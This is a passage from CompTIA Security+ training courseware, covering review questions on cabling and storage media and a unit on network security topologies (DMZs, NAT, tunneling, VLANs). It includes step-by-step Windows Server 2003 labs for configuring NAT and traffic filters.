                         B      5.25 inches
                         C      8 inches
                         D      12 inches

                      2 A(n) ___________ detects the changing pattern of reflected light from the bumps
                        in the aluminum coating on a CD.
                         A      magnetic field
                         B      optoelectronic sensor
                         C      infrared beam
                         D      disk texture sensor

                      3 Smart Media is an example of solid-state storage media. True or false?

                         True
                                                                 Transmission and storage media        10–19


Unit summary: Transmission and storage media
Topic A   In this topic, you learned about the various types of transmission media used in
          network communications. You examined the advantages and disadvantages of each type
          and learned how to harden the physical layer of the OSI model to protect against
          intrusion.
Topic B   In this topic, you learned about the various types of storage media used to store data.
          You identified the characteristics of each medium. Finally, you learned how to properly
          store data and, when it is no longer usable, destroy it.

          Review questions
           1 Describe coaxial cable construction.
              It is composed of a single wire conductor surrounded by an insulating material, which in turn is
              surrounded by a braided metal shield.

           2 Fill in the answers below

           RG         Ohms         Typically used for

           RG-8        50           Ethernet network LAN backbone

           RG-58       50           Ethernet networks

           RG-59       75           Cable TV and cable modems


           3 Describe twisted pair cable.
              Individual wires are twisted together to prevent cross talk between pairs and to reduce the effects
              of EMI and RFI.

           4 What is the difference between UTP and STP cable?
              STP includes an extra foil shield that is wrapped between the copper pairs to provide additional
              protection from EMI.

           5 Cat 5 twisted pair cables support 1000 Mbps Ethernet. True or False?
              False. Cat 5 supports 100 Mbps. Cat 6 supports 1000 Mbps.

           6 Fiber optic cable is more susceptible to damage than coax or twisted pair cable.
             True or False?
              True

           7 What are the advantages of using fiber optic cable?
              Very high bandwidth, EMI immunity, long distances.

           8 List potential damage that can be caused by altering data flows on the network.
              Data corruption, sabotage of core business plans, impersonation of corporate nodes to gain
              network access.
10–20 CompTIA Security+ Certification

                     9 What is war driving?
                       Using a laptop’s wireless network interface card set in promiscuous mode to pick up unsecured
                       wireless signals; usually carried out by driving around with a laptop to locate the signals.

                    10 List the three major types of storage media.
                       Magnetic, optical, and solid-state.

                    11 List examples of storage devices that use a metal oxide coating.
                       Floppy disks, hard drives, cartridge drives, tape drives.

                    12 List examples of storage media that use light and reflection to transmit data.
                       CD-ROM, CD-R, CD-RW, and DVD.

                    13 What is a potential drawback to allowing users to use flash memory drives?
                       This can lead to unwanted files being introduced to the computer or network. It can also result in
                       theft of files from the computer or network. Some of these devices are also bootable which can
                       lead to additional security problems such as the introduction of viruses.

                    14 If one person takes a floppy disk off-site with unencrypted data, the entire company
                       has been compromised. True or False?
                       True

                    15 How should data be disposed of?
                       By physically destroying the media or erasing the data, depending on the level of security
                       required.
                                                Transmission and storage media   10–21

Independent practice activity
An advanced feature of NTFS is the ability to encrypt files and folders. Unlike most
encryption programs, NTFS encryption is transparent to the user. This is especially
useful for users that are not concerned with learning the details behind the operating
system, but who want to create data, encrypt it, and move on. The disadvantage to
transparent encryption, however, is that while the users are not bothered by knowing
which data is encrypted, they also are not notified about which data is decrypted,
opening a potential security hole. After completing this activity, you’ll be able to
encrypt a file on an NTFS partition and remove the encryption by copying the file to a
floppy disk.
Note: Students should have computers running Windows Server 2003 server with an
NTFS partition and a floppy disk inserted into the floppy drive.
 1 Using Windows Explorer, navigate to C:\Documents and Settings\Administrator.
 2 Right-click the Start Menu folder and choose Properties.
 3 Click the Advanced… button.
 4 Check the Encrypt contents to secure data box.
 5 Click OK.
 6 Click OK; you’ll be asked to confirm changes.
 7 Verify that the Apply changes to this folder, subfolders and files radio button is
   selected.
 8 Click OK.
 9 Right-click Start Menu folder and select Send To, 3½ Floppy (A).
10 When prompted about encryption, click Ignore All.
11 Once the files are copied, navigate to the floppy disk drive.
12 Right-click the Start Menu folder and choose Properties. Notice that the
   Advanced button is no longer available. The files were decrypted.
                                                                  11–1


Unit 11
Network security topologies
                         Unit time: 120 minutes

                         Complete this unit, and you’ll know how to:

                         A Describe security zones and identify their
                            role in network security.

                         B Explain the features and configuration of
                            Network Address Translation (NAT).

                         C Discuss how tunneling can create a virtual
                            private network.

                         D Describe VLANs and explain their
                            significance as related to network security.
11–2      CompTIA Security+ Certification


Topic A: Security topologies
                     This topic covers the following CompTIA Security+ exam objective:

                      #        Objective

                      3.3      Understand the concepts behind the following kinds of Security Topologies
                                • Security Zones
                                    • DMZ (Demilitarized Zone)
                                    • Intranet
                                    • Extranet




                     Elements of network topologies
Explanation          Security zones, NAT, tunneling, and VLANs are important elements in creating network
                     topologies to secure data and networked resources.
                            • Security zones—including demilitarized zones (DMZs), extranets and
                              intranets—are put in place using firewalls and routers on the network edge and
                              permit secure communications between the organization and third parties.
                            • Network address translation (NAT) masks the source address contained in an IP
                              packet to thwart attackers.
                            • Tunneling encrypts and encapsulates network traffic to build a secured
                              connection over a public network.
                            • Virtual local area networks (VLANs), which are deployed using network
                              switches, segment different hosts from each other on the network.
                     Each of these technologies will be examined to provide an understanding of the
                     fundamentals of security topologies.

                     Security zones
                     Any network that is connected (directly or indirectly) to your organization, but is not
                     controlled by your organization, represents a risk. To alleviate these risks, security
                     professionals create security zones, which divide the network into areas of similar levels
                     of security (trusted, semi-trusted, and untrusted). You create the security zones by
                     putting all your publicly accessed servers in one zone and restricted-access servers in
                     another, then separating both from an external network like the Internet using firewalls.
                     The three main zones into which networks are commonly divided are the intranet,
                     perimeter network, and extranet.

                     Intranet
                     The intranet is the organization’s private network; this network is fully controlled by the
                     company and is trusted. The intranet typically contains confidential or proprietary
                     information relevant to the company and, consequently, restricts access to internal
                     employees only. The private internal LAN(s) are protected from other security zones by
                     one or more firewalls, which restrict incoming traffic from both the public and DMZ
                     zones.
                                                                                Network security topologies    11–3

                        As an additional safeguard to prevent intrusion, intranets use private address spaces.
                        These IP addresses are reserved for private use by any internal network and are not
                        routable on the Internet. The following address ranges are reserved:
                            • Class A       10.0.0.0 – 10.255.255.255
                            • Class B       172.16.0.0 – 172.31.255.255
                            • Class C       192.168.0.0 – 192.168.255.255
                        Additional security measures include:
                            • Installing anti-virus software
                            • Removing unnecessary services from mission-critical servers
                            • Auditing the critical systems configurations and resources

                        DMZ
                        Demilitarized zones are semi-trusted networks that are owned and controlled by the
                        company, but have a lower level of security than the intranet. (The term comes from the
Not all organizations   geographic buffer zone that was set up between North Korea and South Korea following
require a DMZ, so       the UN “police action” in the early 1950s.) DMZs are commonly used by companies
explain to students     that want to host their own Internet services, while preventing access to their internal
that a DMZ is
                        networks.
necessary only if a
company wishes to       The DMZ is typically a network segment consisting of a combination of firewalls,
host its own public     bastion hosts, and devices accessible to Internet traffic, such as proxy servers, Web
resources such as       (HTTP) servers, FTP servers, SMTP (e-mail) servers, and DNS servers. This zone also
Web servers and         serves as a buffer zone between the Internet and intranet.
DNS servers. Many
organizations host      Exhibit 11-1 and Exhibit 11-2 show two sample configurations for the perimeter
their Web server and    network. In Exhibit 11-1, the DMZ zone is isolated by two firewalls, one leading to the
other public servers    Internet, the other to the intranet. This configuration protects the Web server with a
with a third party,     firewall that allows access to the HTTP for Web services, but restricts all other
thereby avoiding the    protocols. A separate firewall is used to isolate the intranet from all Internet traffic. This
necessity of a DMZ.
                        implementation of the DMZ is called a screened subnet.




                        Exhibit 11-1: Three-tiered security topology
11–4   CompTIA Security+ Certification

                  In Exhibit 11-2, a single firewall with three network interfaces (three-NIC firewall)
                  provides the separation of the intranet, the DMZ and the external network. A single
                  device protects both the perimeter network and the intranet. This network configuration
                  is not as secure as the Exhibit 11-1: a failure or compromise of the three-NIC firewall
                  can result in the compromise of the perimeter network and intranet simultaneously.




                  Exhibit 11-2: Security zones created by three-NIC firewall

                  Internet users can access only the hosts on the DMZ. In the event that an outside user
                  penetrates the DMZ host’s security, Web pages or FTP files might be corrupted, but no
                  other company information would be exposed.

                  Filter outgoing traffic
                  Filtering traffic originating from a DMZ impairs an attacker’s ability to have a
                  vulnerable host communicate to the attacker’s host. An attacker often has the vulnerable
                  DMZ host initiate commands that open an outgoing connection from the DMZ to the
                  attacker’s host to receive more commands to run. Blocking this initial outbound
                  connection makes life harder for the attacker. Applying filtering to traffic leaving the
                  DMZ can also keep a compromised host from being used as a traffic-generating agent in
                  distributed denial-of-service attacks.
                  Assuming you know that DMZ hosts should not be initiating outbound traffic, you can
                  trigger an intrusion detection alarm to notify you whenever the rule is engaged.
                  Likewise, because you know what traffic should originate on your hosts, you can
                  construct filters that notify you when someone tries to initiate traffic outside of what is
                  expected. This is a key principal in constructing intrusion detection alarms and can be a
                  highly effective method of notifying you when your host has been compromised.
                  The most basic method of limiting outbound traffic is to construct a firewall rule or
                  router filter that specifically drops traffic initiated from devices on the DMZ network
                  interface to the Internet.
                                                       Network security topologies   11–5

Filter incoming traffic
Another good candidate for filtering is the traffic coming in from the DMZ interface of
the firewall or router that appears to have a source IP address on a network other than
the DMZ network number. This traffic generally represents spoofed traffic that is often
associated with denial-of-service attacks. When dropping these types of security-related
traffic, the firewall or router should be configured to initiate a log message or rule alert
so that a notification of a potential system compromise can be sent to an appropriate
administrator.
A solid understanding of what kind of network traffic is expected to be generated is
essential for this kind of configuration to work. The key is to limit traffic to only
authorized access. Remember that several common protocols, such as FTP and DNS,
initiate outbound connections. Special consideration should be given to these kinds of
protocols. Applying these recommendations can make an attacker’s job much more
difficult and provide an administrator early notification when a host has been
compromised.

Extranet
The extranet is an extension of your private network or intranet. It allows you to share
your business information or operations with another business, such as a supplier,
vendor, partner, or customer. This is often referred to as business-to-business (B2B)
communications or networks because one company uses the internal resources and
services of another.
An extranet requires security and privacy. These are accomplished through firewall
management, the issuance and use of digital certificates or similar means of user
authentication, encryption of messages, and the use of VPNs that tunnel through the
public network.
Companies can use an extranet to:
   • Exchange large volumes of data using Electronic Data Interchange (EDI).
    • Share product catalogs exclusively with wholesalers or those in the trade.
    • Collaborate with other companies on joint development efforts.
    • Jointly develop and use training programs with other companies.
    • Provide or access services provided by one company to a group of other
      companies, such as an online banking application managed by one company on
      behalf of affiliated banks.
    • Share news of common interest exclusively with partner companies.
11–6     CompTIA Security+ Certification

Do it!              A-1:      Understanding security zones
                      Questions and answers
                       1 How do you create a security zone?

                          Put all your publicly accessed servers in a DMZ zone and restricted-access servers in an
                          intranet zone, then separate both using a firewall. Use an additional firewall or NIC installed
                          on a firewall to isolate the DMZ from the Internet.

                       2 A demilitarized zone (DMZ) is used by a company that wants to host its own
                         Internet services while preventing access to its private network. True or false?

                          True

                       3 The DMZ is the most insecure area of your network infrastructure. What hardware
                         is reserved for this area? (Choose all that apply.)
                          A      Print servers
                          B      Firewalls
                          C      Public Internet servers, such as HTTP, FTP, and Gopher servers
                          D      Mail servers

                       4 How are security and confidentiality maintained on an extranet?

                          These are accomplished through firewall management, the issuance and use of digital
                          certificates or similar means of user authentication, encryption of messages, and the use of
                          VPNs that tunnel through the public network.

                       5 List three rules that the DMZ firewall should include.

                          Answers may include:
                          • Filter traffic originating from a DMZ.
                          • Construct filters that notify you when someone tries to initiate traffic outside of what is
                              expected.
                          • Specifically drop traffic initiated from devices on the DMZ network interface to the
                              Internet.
                          • Filter the traffic coming in from the DMZ interface of the firewall or router that appears to
                              have a source IP address of a network other than the DMZ network number.
                          • Block all ports except for required services.
                                                                             Network security topologies   11–7


Topic B: Network Address Translation
              This topic covers the following CompTIA Security+ exam objective:

               #        Objective

               3.3      Understand the concepts behind the following kinds of Security Topologies
                         • NAT (Network Address Translation)




              NAT
Explanation   Network Address Translation (NAT) is a service that allows the conversion of internal
              private (IP) addresses to Internet public addresses. They are not routable and are not
              directly accessible from the Internet. NAT was originally developed as an interim
              solution to tackle IPv4 address depletion by allowing globally registered IP addresses to
              be reused or shared by several hosts. The “classic” NAT defined by RFC 1631 maps IP
              addresses from one realm to another. A more recent definition of NAT is found in RFC
              3022.
              NAT serves two main purposes:
                     • It provides a type of firewall by hiding internal IP addresses.
                     • It enables a company to use more internal IP addresses. Because they’re only
                       used internally, there’s no possibility of conflict with IP addresses used by other
                       companies and organizations.
              Although it can be used to translate between any two address realms, NAT is most often
              used to map IPs from the private address spaces defined by RFC 191, as shown here:
                     Class       Private Address Range
                     A           10.0.0.0 … 10.255.255.255
                     B           172.16.0.0 … 172.31.255.255
                     C           192.168.0.0 … 192.168.255.255
              These addresses were reserved for use by private networks. Enterprises can freely use
              these addresses to avoid obtaining registered public addresses. Because private
              addresses can be reused by other organizations, they are not unique and are nonroutable
              over a common infrastructure. When communication between a privately addressed host
              and a public network (such as the Internet) is needed, address translation is required.
              This is where NAT comes in.
              NAT routers sit on the border between private and public networks, converting private
              addresses in each IP packet into legally registered public ones. They also provide
              transparent packet forwarding between addressing realms. The packet sender and
              receiver (should) remain unaware that NAT is taking place. Today, NAT is commonly
              supported by WAN access routers and firewalls situated at the network edge.
11–8         CompTIA Security+ Certification

                          Static NAT
                          NAT works by creating bindings between addresses. In the simplest case, a one-to-one
                          mapping might be defined between public and private addresses. Known as static NAT,
                          this can be accomplished by a straightforward, stateless implementation that transforms
                          only the network part of the address, leaving the host part intact. The payload of the
                          packet must also be considered during the translation process. The IP checksum must, of
                          course, be recalculated. Because TCP checksums are computed from a pseudo-header
                          containing source and destination IP address (attached to the TCP payload), NAT must
                          also regenerate the TCP checksum.

                          Dynamic NAT
                          More often, a pool of public IP addresses is shared by an entire private IP subnet in a
                          form of NAT called dynamic NAT. Edge devices that run dynamic NAT create bindings
                          “on the fly” by building a NAT table. Connections initiated by private hosts are
                          assigned a public address from a pool. As long as the private host has an outgoing
                          connection, it can be reached by incoming packets sent to this public address. After the
                          connection is terminated (or a timeout is reached), the binding expires, and the address
                          is returned to the pool for reuse.
                          Dynamic NAT is more complex because state must be maintained, and connections
                          must be rejected when the pool is exhausted. However, unlike static NAT, dynamic
                          NAT enables address reuse, reducing the demand for legally registered public addresses.
                          The potential problem with dynamic NAT (or static NAT for that matter) is that it has
                          fewer public addresses than inside hosts. If you have 254 public addresses, for example
                          (a class C network), you might assign 3 or 4 of those to static devices, like Web servers
                          and DNS servers. That leaves 250 addresses for dynamic NAT. But what if your
                          organization has 500 hosts? If more than 250 want to use the Internet at the same time,
                          you will run out of public addresses. The solution? PAT.

                          Port Address Translation (PAT)
                          A variation of dynamic NAT, known as Port Address Translation (PAT), might be used
                          to allow many hosts to share a single IP address by multiplexing streams differentiated
Since a port number is    by TCP/UDP port numbers. For example, suppose private hosts 192.168.0.2 and
16 bits long, this has
the potential for a
                          192.168.0.3 both send packets from source port 1108. A PAT router might translate
single IP address to      these to a single public IP address 206.245.160.1 and two different source ports, say
serve as many as          61001 and 61002. Response traffic received for port 61001 is routed back to
65,536 different hosts.   192.168.0.2:1108, while port 61002 traffic is routed back to 192.168.0.3:1108.
                          PAT is commonly implemented on Small Office/Home Office (SOHO) routers to
                          enable shared Internet access for an entire LAN through a single public address.
                          Because PAT maps individual ports, it is not possible to “reverse map” incoming
                          connections for other ports unless another table is configured. A virtual server table can
                          make a server on a privately addressed DMZ reachable from the Internet via the public
                          address of the PAT router (one server per port). This is really a limited form of static
                          NAT, applied to incoming requests.
                                                     Network security topologies   11–9

In some cases, static NAT, dynamic NAT, PAT, and even bi-directional NAT or PAT
might be used together. For example, an enterprise might locate public Web servers
outside of the firewall on a DMZ, while placing a mail server and clients on the private
inside network, behind a NAT firewall. Furthermore, suppose there are applications
within the private network that periodically connect to the Internet for long periods. In
this case:
    • Web servers can be reached from the Internet without NAT, because they live in
      public address space.
    • Simple Mail Transfer Protocol (SMTP) sent to the private mail server from the
      Internet requires incoming translation. Because this server must be continuously
      accessible through a public address associated with its Domain Name System
      (DNS) entry, the mail server requires static mapping (either a limited-purpose
      virtual server table or static NAT).
    • For most clients, public address sharing is usually practical through dynamically
      acquired addresses (either dynamic NAT with a correctly sized address pool, or
      PAT).
    • Applications that hold onto dynamically acquired addresses for long periods
      could exhaust a dynamic NAT address pool and block access by other clients.
      To prevent this, long-running applications might use PAT because it enables
      higher concurrency (thousands of port mappings per IP address).
11–10 CompTIA Security+ Certification

Do it!              B-1:    Discussing Network Address Translation
                     Questions and answers
                      1 What are the primary functions that NAT performs? (Choose all that apply.)
                        A    Provides a type of firewall by hiding internal IP addresses.
                        B    Enables a company to use more internal IP addresses. Because they’re used
                             internally only, there’s no possibility of conflict with IP addresses used by
                             other companies and organizations.
                        C    Allows a company to combine multiple ISDN connections into a single
                             Internet connection.
                        D    All of the above.

                      2 In what class is address range 10.0.0.0 – 10.255.255.255?
                        A    A
                        B    B
                        C    C
                        D    D

                      3 In what class is address range 192.168.0.0 – 192.168.255.255?
                        A    A
                        B    B
                        C    C
                        D    D

                      4 Which of the following protocols map private IP addresses to registered IP
                        addresses on a one-to-one basis?
                        A    Dynamic NAT
                        B    Static NAT
                        C    Firewall NAT
                        D    Dynamic PAT

                      5 Which of the following IP address ranges is reserved for private networks?
                        A    10.0.0.0 through 10.255.255.255
                        B    172.16.0.0 through 172.31.255.255
                        C    192.168.0.0 through 192.168.255.255
                        D    All of the above
                                                                          Network security topologies      11–11

Do it!                      B-2:   Configuring RRAS with NAT
                             Here’s how                         Here’s why
                             1 Log on as Administrator on       Windows Server 2003 Routing and Remote
       For this activity,
each student requires a        Server-X                         Access (RRAS) includes a service that can
partner. Each pair                                              perform network address translation (NAT). In
requires two Windows                                            this activity, you will configure the Windows
Server 2003 servers, a                                          Server 2003 RRAS server for NAT.
Windows Server 2003
server CD, Internet                                             For this activity, you will need a partner. Each
access, and a crossover                                         “partnership” should have two Windows Server
cable.                                                          2003 servers (one with two NIC adapters
Important: Students                                             installed), a Windows Server 2003 server CD,
should not connect the                                          Internet access and a crossover cable.
crossover cable until
instructed to do so.                                            Note: The server with two NIC cards will be
                                                                referred to as Server-X; the other as Server-Y.
                                                                Substitute the correct server names for these
                                                                names.

                             2 Click Start

                               Choose Control Panel and
                               right-click Network
                               Connections

                               Choose Open

                             3 Right-click the second network   This card is not connected to the classroom
                               interface                        network.

                               Choose Properties

                             4 Double-click Internet
                               Protocol (TCP/IP)

                             5 Verify that Obtain an IP         If it isn’t, select Obtain an IP address
                               address automatically is         automatically.
                               selected

                               Click OK

                               Click OK

                             6 Right-click the second network   In Network Connections.
                               interface

                               Choose Rename

                             7 Enter Internal as the name

                               Press e
11–12 CompTIA Security+ Certification

                      8 Right-click the first network
                        interface

                        Rename this card as External

                      9 Click Start

                        Choose Administrative
                        Tools, Routing and Remote
                        Access

                     10 Right-click Server-X

                     11 Select Configure and Enable        To start the Routing and Remote Access Server
                        Routing and Remote                 Setup Wizard.
                        Access

                     12 Click Next                         At the Welcome screen.

                     13 Select Network address
                        translation(NAT)

                        Click Next

                     14 Verify that Use this public        The External card should be connected to the
                        interface to connect to the        classroom network and the Internal card should
                        Internet is selected               be disconnected for now.

                        Select the External interface in   If necessary.
                        the list of available interfaces

                     15 Click Next

                     16 Click Finish                       To start the Routing and Remote Access.

                     17 Expand Server-X                    If necessary (In Routing and Remote Access).

                     18 Expand IP Routing                  If necessary.

                     19 Select General

                     20 Right-click the Internal           Make sure that you only configure the Dedicated
                        interface                          interface.

                        Choose Properties

                     21 Activate the Configuration tab

                     22 Select Use the following IP        To set static IP addressing on the Internal
                        address                            interface.

                        Enter 10.10.10.1                   As the IP address.

                        Enter 255.0.0.0                    As the Subnet mask.
                                             Network security topologies      11–13

23 Click OK                        To save the changes.

24 Click OK                        To acknowledge the warning message.

25 Close and reopen Routing and    (To reopen the MMC console. Click Start, then
   Remote Access                   choose Administrative Tools, Routing and
                                   Remote Access.)

26 Select NAT/Basic Firewall       Under IP Routing.

27 Right-click Internal            If there are multiple instances of Internal, for
                                   this step it doesn’t matter which instance you
                                   choose.

   Choose Properties

28 Verify that Private interface
   connected to private
   network is selected

   Click OK

29 Right-click the External
   interface

   Choose Properties

30 Verify that Public interface
   connected to the Internet
   is selected

   Click OK

31 Close Routing and Remote
   Access
11–14 CompTIA Security+ Certification

                                 Configuring a private subnet
Explanation                      If your network is using DHCP, you need to set static IP addresses for the Internal
                                 interface on Server-X and the primary interface on Server-Y. By connecting these two
                                 interfaces with a crossover cable, you will create a private subnet. With the NAT server
                                 properly configured, you can begin to allow clients to access the Internet.

Do it!                           B-3:    Configuring the client for Internet access
                                  Here’s how                                Here’s why
                                   1 On Server-Y, disconnect the cable      You’ll use NAT to configure a client for Internet
         Students will require
a Windows Server 2003                to the classroom network               access.
server running RRAS with
NAT, a second Windows              2 Connect a crossover cable from         Follow your instructor’s directions for
Server 2003 server to act            Server-Y to Server-X                   connecting the cable.
as a client, Internet
access on Server-X, and a
crossover cable. Assist            3 Log on to Server-Y as
students with connecting              Administrator
the crossover cable.
                                   4 Click Start

                                      Choose Control Panel and
                                      right-click Network
                                      Connections

                                      Choose Open

                                   5 Right-click the network interface

                                      Choose Properties

                                   6 Double-click Internet
                                      Protocol (TCP/IP)

                                   7 Select Use the following IP            To set static IP addressing.
                                      address

                                      Enter 10.10.10.2                      As the IP address.

                                   8 Press t                                (Do not press Enter.) To set the Subnet mask.

                                      Enter 10.10.10.1                      (As the default gateway.) This is the Internal
                                                                            address for Server-X.

                                   9 Under Use the following                As the Preferred DNS server.
                                      DNS server addresses, enter
                                      the IP address of the training
                                      center’s DNS server

                                      Click OK

                                      Click OK
                                                  Network security topologies   11–15

10 Open Internet Explorer               To access the Internet.

11 Navigate to your favorite Web site

12 Close Internet Explorer
11–16 CompTIA Security+ Certification

                           Disabling specific ports
Explanation                In some cases, you might want to disable access to specific ports on the NAT server.
                           For example, some companies have had users abuse Internet access by using it for non-
                           job-related tasks, such as listening to online radio stations. This might seem harmless to
                           the average user, but it can be a nightmare for network engineers. The bandwidth
                           consumption used by the Internet radio stations is very large and can get much worse if
                           they are sending streaming video. Windows Server 2003 with RRAS has the ability to
                           block specific ports to allow network engineers to manage Internet access.

Do it!                     B-4:    Filtering outgoing traffic
                            Here’s how                                 Here’s why

         Students should     1 On Server-X, click Start                To configure NAT output filters and to block
have a Windows Server
                                                                       Internet access for all users that use NAT.
2003 server running
RRAS and NAT and a              Choose Administrative
second Windows Server           Tools, Routing and Remote
2003 server to act as a         Access
client.
                             2 Expand IP Routing                       If necessary.

                                Select General

                             3 Right-click the External
                               interface

                                Choose Properties                      To open the External Properties dialog box. The
                                                                       General tab is activated by default.

                             4 Click Outbound Filters…                 To open the Outbound Filters dialog box.

                                Click New…                             To open the Add IP Filter dialog box.
                                              Network security topologies      11–17

5 Enter the information shown       To block all Internet access to port 80.
  below




6 Click OK                          To return to the Outbound Filters dialog box.
                                    The settings you just entered instruct the router
                                    to block all Internet access using the HTTP
                                    protocol.

7 Verify that Transmit all
  packets except those that
  meet the criteria below is
  selected

  Click OK twice

8 On Server-Y, launch Internet      Internet Explorer will try to load the page. After
  Explorer and try to access your   a few minutes, you’ll receive the error message:
  favorite Web site                 “The page cannot be displayed”.

9 Close Internet Explorer
11–18 CompTIA Security+ Certification

                    Controlling local FTP access
Explanation         FTP is a useful tool for transferring files across the Internet, but it has a major security
                    flaw: it sends usernames and passwords across the LAN in plain text. By using
                    Windows Server 2003 RRAS input and output filters, you can control FTP access
                    without blocking other services. In the following activity, you’ll block local FTP access
                    but allow Internet FTP access. The reason for doing this is that local FTP traffic is
                    susceptible to sniffing, while most Internet FTP sites use anonymous access, which is
                    not.

Do it!              B-5:     Blocking local FTP access
                     Here’s how                                  Here’s why
                      1 On Server-X, right-click the
                        Internal interface

                         Choose Properties

                      2 Click Inbound Filters…                   To open the Inbound Filters dialog box.

                         Click New…

                      3 Enter the information shown              To block local FTP traffic while still allowing
                        below                                    Internet ftp access.




                         Click OK                                To return to the Inbound Filters dialog box.

                      4 Verify that Receive all
                         packets except those that
                         meet the criteria below is
                         selected

                         Click OK

                      5 Click OK
                                               Network security topologies   11–19

 6 On Server-Y, click Start

   Choose Run

   Enter cmd

 7 At the command line, enter ftp   To connect to Server-X via ftp. You’ll be
   10.10.10.1                       notified that you are connected to Server-X, but
                                    the connection will time out, and you’ll receive
                                    the message: “Connection closed by remote
                                    host”.

 8 At the command line, enter the
   following commands:

   ftp                              Enter ftp, and when the ftp prompt is displayed,
   open ftp.microsoft.com           enter open ftp.microsoft.com.

                                    You’ll connect successfully and be prompted to
                                    log on.

 9 Press c + C,                     To exit the ftp site.
   then enter quit

10 On Server-X, right-click         To start the process of removing the NAT
   External interface               outbound filters.

   Choose Properties

11 Click Outbound Filters

12 Click Delete

   Click OK                         To close the Output Filters window.

   Click OK                         To close the External Properties window.

13 Right-click Internal interface   To start the process of removing the NAT
                                    inbound filters.

   Choose Properties

14 Click Inbound Filters

15 Click Delete

   Click OK                         To close the Input Filters window.

   Click OK                         To close the Internal Properties window.
11–20 CompTIA Security+ Certification

                     16 Right-click Server-X

                        Choose Disable Routing and            To disable Routing and Remote Access.
                        Remote Access

                        Click Yes                             To confirm the change.

                     17 Remove the crossover cable from
                        Server-Y

                     18 Reconnect the network cable for
                        Server-Y to the classroom
                        network

                     19 On Server-Y, access the
                        properties of the network interface

                        Select Obtain an IP address
                        automatically

                        Select Obtain DNS server
                        address automatically

                     20 Click OK twice

                     21 Close all windows
                                                                          Network security topologies   11–21


Topic C: Tunneling
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.3   Understand the concepts behind the following kinds of Security Topologies
                      • Tunneling




              How tunneling works
Explanation   A technology that enables a network to securely send its data through an untrusted or
              shared network infrastructure, tunneling works by encrypting and encapsulating the
              secured traffic within packets carried by the second network. Virtual private networks
              are perhaps the best-known example of tunneling technology.
              Exhibit 11-3 provides an example of a site-to-site (or gateway-to-gateway) tunnel. In
              this depiction, an organization has two offices and each has an Internet connection. The
              two offices routinely need to share sensitive data between their LANs. Approaches such
              as e-mail encryption are usable, but do not provide the convenience or scalability that
              the organization desires. The ideal solution is a direct secure link between the two
              LANs that permits the offices to use the same servers.




              Exhibit 11-3: Tunneling across a shared infrastructure

              To solve the problem, a router with Internet Protocol Security (IPSec) encryption
              capabilities is deployed as a gateway on each LAN’s Internet connection. The routers
              are configured for a point-to-point VPN tunnel, which uses encryption to build a virtual
              connection between the two routers. When a router sees traffic on its LAN that is
              destined for the other office, it communicates over the Internet to the router on the other
              side instructing it to build the tunnel. The “tunnel” is actually an agreement between the
              two routers on how the data is encrypted.
              Once the two routers have negotiated a secure encrypted connection, traffic from the
              originating host is encrypted using the agreed-upon settings and sent to the peer router.
              The peer router decrypts the data and forwards it to the appropriate host on its LAN.
              The connection appears to be a tunnel, because the hosts on the two LANs are unaware
              that their data is being encrypted. The encryption and delivery of the data over the
              untrusted network happens transparently to the communicating hosts.
              Because of their low cost (VPN tunnels often use existing Internet connections) and
              security, tunneling has become common, replacing wide area network (WAN) links
              such as frame relay connections. Tunneling is an option for most IP connectivity
              requirements.
11–22 CompTIA Security+ Certification

Do it!                       C-1:   Reviewing VPN tunneling
                              Questions and answers
Make sure that students       1 Which of the following protocols are used to secure a VPN connection?
understand that L2TP and
PPTP are tunneling              A    IPSec
protocols and, unless
combined with an                B    L2TP
encryption protocol such
as IPSec or MPPE, do not        C    MPPE
guarantee confidentiality.
                                D    PPTP

                              2 For each of the descriptions below, indicate whether the VPN is a remote access
                                or site-to-site topology.

                                Creates a secured connection between a remote client       Remote access
                                and an access point or the corporate network

                                Establishes a point-to-point connection                    Site-to-site

                                Requires an ISP to establish the tunnel                    Remote access

                                Uses tunnel mode encryption                                Site-to-site

                                Decrypts the entire IP packet before forwarding to the     Site-to-site
                                destination host
                                                                          Network security topologies   11–23


Topic D: Virtual Local Area Networks
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.3   Understand the concepts behind the following kinds of Security Topologies
                      • VLANs (Virtual Local Area Network)




              VLANs
Explanation   Virtual local area networks (VLANs) are a way of dividing a single physical network
              switch among multiple network segments or broadcast domains. This ability to
              configure multiple VLANs on a single switch is a very powerful and useful technology
              that offers network flexibility, scalability, increased performance, and some security
              features. VLANs are often coupled with a complimentary technology, called a trunk,
              which allows switches to share many VLANs over a single physical link. And because
              VLANs make it easy to segment a network into multiple subnets (which cannot
              communicate with each other), they increase the need for routers (which enable
              communications between subnets), and have a number of important security features,
              such as packet-filtering capabilities.
              Because of their benefits, VLANs (and by association, trunking) have become
              extremely widespread. Most enterprise-grade network switches come standard with the
              ability to define VLANs. However, VLANs do suffer from a number of vulnerabilities,
              which can be mitigated by following best practices in network design.

              How it works
              As an example of how VLANs work, we’ll use a Cisco Catalyst 6509 switch belonging
              to a business with five departments and 220 employees. This type of switch is an
              enterprise-class switch that can support a line card with 48 Ethernet ports in up to eight
              of its nine slots. That’s a total of 384 Ethernet ports on a single switch!
              By configuring several VLANs on the switch, and assigning each port to an appropriate
              VLAN, the single physical switch is broken up into multiple logical switches. The
              business in our example can configure a separate VLAN for each department. It doesn’t
              matter to which port a given user’s computer is connected because the switch can be
              configured to place the port into any VLAN.
11–24 CompTIA Security+ Certification

                    Exhibit 11-4 illustrates a hypothetical switch configuration in which some ports on line
                    card 2 are configured for VLAN 2 and others are configured for VLAN 1. VLAN 1
                    includes noncontiguous ports on two different line cards. The configuration is up to the
                    system administrator; any port can be configured for any VLAN, regardless of its
                    physical location on the switch. Each VLAN behaves in many senses like a different
                    switch: hosts on VLAN 1 cannot communicate with hosts on VLAN 2 unless a router is
                    connected to both subnets to forward traffic between them. However, the switch’s
                    configuration determines what VLANs exist and to which VLAN each port is assigned.
                    Trunking adds even more power to VLANs by allowing switches to forward data from
                    multiple VLANs over a single physical link. In Exhibit 11-5, you see an example in
                    which switch A provides connectivity to users on the fourth, fifth, and sixth floors of an
                    office building. Switch B provides network connectivity to users on the fourth floor.
                    The switch for each floor is in turn connected by a single Ethernet connection to a
                    central switch, switch E.




                    Exhibit 11-4: Physical VLAN configuration on Cisco Catalyst 6509

                    Because the connection between each switch is a trunk, packets from any VLAN can
                    pass across it. (The normal VLAN boundaries apply, however. Hosts on different
                    VLANs cannot communicate with each other over trunks.) This enables hosts connected
                    to VLAN 20 on the fourth floor to communicate with hosts on the sixth floor who are
